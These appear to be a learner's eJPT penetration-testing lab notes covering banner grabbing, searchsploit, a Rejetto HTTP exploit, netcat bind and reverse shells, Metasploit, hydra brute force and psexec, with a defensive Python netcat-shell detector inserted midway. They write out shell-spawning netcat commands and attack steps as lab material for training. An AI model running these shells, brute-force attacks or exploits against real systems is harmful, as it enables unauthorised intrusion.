EJPT9
BANNER GRABBING(lab):
Using banner grabbing to identify the services running on the target. It has an SSH
lab which was already done previously.
Using nmap for banner grabbing:
nmap -sV --script=banner ip
From now on, if the video or lab has already been done I will skip it, and yeah, if
anything new comes up I will write it down, I will skip nothing.
:)
Exploits:
The first part was about searching for publicly available exploits using exploitdb
and being careful to use verified exploits, as sometimes the exploits may have
malicious code inside them. We can also use Google dorks for searching for
exploits.
A useful website for getting news about exploits: packetstorm.
FIXING EXPLOITS:
We will be exploiting a vulnerable Windows HTTP server, but this time using a manual
approach.
To do so we will use searchsploit:
The exploit we are going to use is the Rejetto HTTP vuln.
Let's copy the exploit from searchsploit to our root directory with:
searchsploit -m exploit number
Then let's see what all needs to be configured etc.
We need to configure the IP address to our local IP address and the port number to
the port we will use for our netcat listener.
For it to work perfectly we need to host a Python HTTP server on our local machine,
and during exploitation the script asks us to host the netcat script on the Python
server. So we do so: copy the netcat script from the directory it is in to our home
directory and also start a netcat listener on any port with nc -nvlp port no.
Then we start our server and use the command:
python exploit.py ip python-server-port-no
It will download the netcat executable from our local machine, which it will use to
connect to the netcat listener we started earlier and give us a reverse shell. Done.
SHELLS:
NETCAT FUNDAMENTALS(lab):
This lab is about netcat: using it to put our files onto the target system,
interacting with the target system, downloading files to the target, how to host
using netcat, banner grabbing etc.
To connect to a TCP port: nc -nv ip port
For UDP:
nc -nvu ip port
BIND SHELL():
It's about bind shells and executing them on the target system using netcat.
For executing the nc bind shell we will transfer our nc.exe to Windows by hosting a
server on Linux.
We have transferred the nc.exe to the Windows machine. Now we will use it to host a
bind shell: nc.exe -nvlp 1234 -e cmd.exe
Now connect from the Kali machine using the command nc -nv ip port
If we want to do the opposite, connect to Kali from Windows,
do
nc -nvlp port -e /bin/bash
and connect from the Windows system using nc.exe -nv ip port
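A defender's counterpart to the bind and reverse shells above, as an added example that is not part of these notes: a small Python check that scans process-creation records for netcat started with an exec flag and labels each hit as a bind shell (listen mode) or a reverse shell (outbound connect). The "user|cmdline" record format and the sample lines are constructed assumptions.

```python
import re

# Constructed sample process-creation records, "user|cmdline" (an assumed format,
# not taken from a real log). The first two mirror the nc commands in these notes.
SAMPLE_EVENTS = [
    "alice|nc.exe -nvlp 1234 -e cmd.exe",
    "www-data|nc -nvlp 4444 -e /bin/bash",
    "bob|nc -nv 10.0.0.5 80",                      # plain connect, no shell handed out
    "alice|nc -zv 10.0.0.5 22",                    # port check only
    "svc|/usr/bin/ncat --exec /bin/sh -l 9001",    # ncat long-form exec flag
    "www-data|nc -nv 10.0.0.9 4444 -e /bin/bash",  # outbound connect plus exec
    "root|python3 -m http.server 8000",
]

NETCAT_BINARIES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}
LONG_EXEC_FLAGS = ("--exec", "--sh-exec")


def classify(cmdline):
    """Return 'bind', 'reverse' or None for one command line (naive whitespace split)."""
    argv = cmdline.split()
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in NETCAT_BINARIES:
        return None
    listening = executes = False
    for arg in argv[1:]:
        if arg.startswith("--"):
            # Long options: --listen, --exec PROG, --exec=PROG, --sh-exec CMD
            name = arg.split("=", 1)[0]
            listening |= name == "--listen"
            executes |= name in LONG_EXEC_FLAGS
        elif arg.startswith("-") and len(arg) > 1:
            # Clustered short options such as -nvlp or -e: 'l' = listen, 'e' = exec
            listening |= "l" in arg[1:]
            executes |= "e" in arg[1:]
    if not executes:
        return None
    return "bind" if listening else "reverse"


def flag_netcat_shells(events):
    """Return (user, verdict, cmdline) for every record that hands a shell to netcat."""
    hits = []
    for record in events:
        user, _, cmdline = record.partition("|")
        verdict = classify(cmdline)
        if verdict:
            hits.append((user, verdict, cmdline))
    return hits
```

Running flag_netcat_shells(SAMPLE_EVENTS) flags the two bind shells from the notes, the ncat listener and the outbound reverse shell, and leaves the plain connects and the HTTP server alone.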
FRAMEWORKS:
MSF FRAMEWORK(lab):
Found a login page for the ProcessMaker admin page, logged in using default creds and
searched in msf for modules, found one PHP module RCE, used it, got RCE and got the
flag from the machine. Boom, done.
---
WINDOWS BLACKBOX:
This is a blackbox testing lab and it's like divided into different parts: one
section for enumeration, one for SSH exploitation, one for SMB exploitation and all.
I'll try to solve all the labs without the video or walkthrough, let's see.
I scanned the server and found many open ports. The first thing I did was exploit the
FTP server by using a bruteforce attack and got the password for administrator.
Also found an SMB server, OpenSSH, Jenkins and Oracle fish, let's exploit further.
Found an OpenSSH server too, let's search for its exploits using searchsploit. Found
a username enumeration, nothing much, we will use SSH bruteforce, let's see, using
hydra for that.
We got a user vagrant and password vagrant, let's use it and log in.
We logged in, found nothing important, let's move forward and search for something else.
Let's exploit SMB:
Bruteforcing SMB and found the pass for administrator: vagrant.
Let's use enum4linux to enumerate users and bruteforce their passwords also.
Now that we have creds we can use psexec to gain remote access.
Got stuck here, forgot the usage of psexec :(
So we will have to copy psexec to our current directory and give it executable
permissions:
cp /usr/share/psexec.py /root/Desktop and then chmod +x psexec.py
usage:
python3 psexec.py administrator@ip
and logged in.
We can also use the psexec module if we don't want this much hassle lol
use exploit/windows/smb/psexec
Now we will exploit PHP. Had to see the solution for this one, it's easy I know, yeah,
but was confused about something :(
Using the PHP msf module for CGI injection
and get a meterpreter shell.
We can also use this msf module to exploit Samba, use
exploit/multi/samba/usermap_script.
Done, Linux blackbox.
OBFUSCATION(no lab):